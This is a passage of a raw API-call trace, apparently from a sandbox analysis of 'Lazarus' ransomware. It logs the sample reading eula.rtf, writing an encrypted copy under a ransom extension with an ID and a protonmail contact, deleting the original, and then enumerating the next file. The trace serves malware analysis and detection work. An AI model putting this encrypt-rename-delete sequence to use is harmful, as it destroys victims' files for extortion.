MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.539] GetLastError () returned 0x0 [0061.539] SetLastError (dwErrCode=0x0) [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3e8 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0061.539] GetLastError () returned 0x0 [0061.539] SetLastError (dwErrCode=0x0) [0061.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69210 [0061.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0061.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.539] AreFileApisANSI () returned 1 [0061.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0061.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0061.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0061.540] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.542] GetFileType (hFile=0x420) returned 0x1 [0061.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0061.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0061.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0061.542] AreFileApisANSI () returned 1 [0061.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 36 [0061.543] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.543] GetFileType (hFile=0x428) returned 0x1 [0061.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0061.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.543] GetLastError () returned 0x0 [0061.543] SetLastError (dwErrCode=0x0) [0061.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.543] GetLastError () returned 0x0 [0061.543] SetLastError (dwErrCode=0x0) [0061.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0061.543] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0xe8e, lpOverlapped=0x0) returned 1 [0061.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0061.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0061.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0061.547] GetLastError () returned 0x0 [0061.547] SetLastError (dwErrCode=0x0) [0061.547] GetLastError () returned 0x0 [0061.547] SetLastError (dwErrCode=0x0) [0061.547] GetLastError () returned 0x0 [0061.547] SetLastError (dwErrCode=0x0) [0061.547] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0061.547] GetLastError () returned 0x0 [0061.547] SetLastError (dwErrCode=0x0) [0061.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d6f0 [0061.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0061.547] GetLastError () returned 0x0 [0061.547] SetLastError (dwErrCode=0x0) [0061.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0061.547] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xe90, lpOverlapped=0x0) returned 1 [0061.548] GetLastError () returned 0x0 [0061.548] SetLastError (dwErrCode=0x0) [0061.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0061.549] GetLastError () returned 0x0 [0061.549] SetLastError (dwErrCode=0x0) [0061.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0061.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0061.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0061.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.549] CloseHandle (hObject=0x420) returned 1 [0061.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0061.550] CloseHandle (hObject=0x428) returned 1 [0061.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.550] AreFileApisANSI () returned 1 [0061.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0061.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 36 [0061.550] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.551] GetFileType (hFile=0x428) returned 0x1 [0061.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0061.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0061.552] GetLastError () returned 0xb7 [0061.552] SetLastError (dwErrCode=0xb7) [0061.552] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0061.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0061.553] CloseHandle (hObject=0x428) returned 1 [0061.553] AreFileApisANSI () returned 1 [0061.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0061.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 36 [0061.553] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf")) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.554] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.555] AreFileApisANSI () returned 1 [0061.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.556] AreFileApisANSI () returned 1 [0061.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0061.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 45 [0061.556] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.556] GetFileType (hFile=0x428) returned 0x1 [0061.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.556] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0061.556] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0061.556] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0061.556] CloseHandle (hObject=0x428) returned 1 [0061.557] AreFileApisANSI () returned 1 [0061.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0061.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 45 [0061.557] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.557] GetFileType (hFile=0x428) returned 0x1 [0061.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.557] CloseHandle (hObject=0x428) returned 1 [0061.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.558] AreFileApisANSI () returned 1 [0061.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0061.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 45 [0061.558] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a)) returned 1 [0061.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.558] AreFileApisANSI () returned 1 [0061.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 